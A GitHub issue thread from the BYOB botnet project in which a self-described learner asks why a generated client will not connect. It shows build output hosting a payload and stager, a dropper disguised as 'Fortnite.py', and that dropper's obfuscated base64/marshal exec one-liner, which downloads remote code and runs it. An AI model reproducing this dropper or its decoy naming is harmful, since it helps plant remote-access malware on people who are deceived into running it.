### ISSUE TITLE
cant connect to it (ps. I have no idea how to do this and, I am trying to learn)

### ISSUE THREAD

**Issue by tboss12310** [malwaredllc/byob#94]
[>] Modules
        Adding modules... -(3 modules added to client)

[>] Imports
        Adding imports...- (27 imports from 3 modules)

[>] Payload
        Compressing payload...  (121,287 bytes reduced to 64,867 bytes (-47.0% smaller)
        Uploading payload... - (hosting payload at: http://192.168.1.132:4445///payloads/ja9.py)

[> Stager
        Compressing stager... (2,197 bytes reduced to 2,163 bytes (-2.0% smaller)
        Uploading stager... - (hosting stager at: http://192.168.1.132:4445///stagers/ja9.py)

[> Dropper
        Writing dropper...  (207 bytes written to Fortnite.py)

C:\Windows\System32\byob\byob>python Fortnite.py
Traceback (most recent call last):
  File "Fortnite.py", line 1, in <module>
    import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmZgYCgtysnJTNIDUvkFqXka6hklJQVW+vqGlkZ6hmYWeoZ6hsZGViYmJqb6+vrFJYnpqUXF+lmJlnoFleqaekWpiSkamgAB9RTt')))))
  File "<string>", line 1, in <module>
  File "C:\Python27\lib\urllib.py", line 87, in urlopen
    return opener.open(url)
  File "C:\Python27\lib\urllib.py", line 213, in open
    return getattr(self, name)(url)
  File "C:\Python27\lib\urllib.py", line 350, in open_http
    h.endheaders(data)
  File "C:\Python27\lib\httplib.py", line 1038, in endheaders
    self._send_output(message_body)
  File "C:\Python27\lib\httplib.py", line 882, in _send_output
    self.send(msg)
  File "C:\Python27\lib\httplib.py", line 844, in send
    self.connect()
  File "C:\Python27\lib\httplib.py", line 821, in connect
    self.timeout, self.source_address)
  File "C:\Python27\lib\socket.py", line 575, in create_connection
    raise err
IOError: [Errno socket error] [Errno 10061] No connection could be made because the target machine actively refused it

C:\Windows\System32\byob\byob>python server.py --host 192.168.1.132 --port 4445

**Comment by vladimirpe00** [comment]
you need to modify the generated  .py file by the client.py and correct the syntax but anyway it will not work it will execute but no connection will be established  I guess the developer should follow up his project thanks for his efforts but it seems his project is broken no one was able to make it run

**Comment by malwaredllc** [comment]
I am unable to reproduce this issue. I tested it on Linux, Windows, and macOS, and it worked normally on every platform.
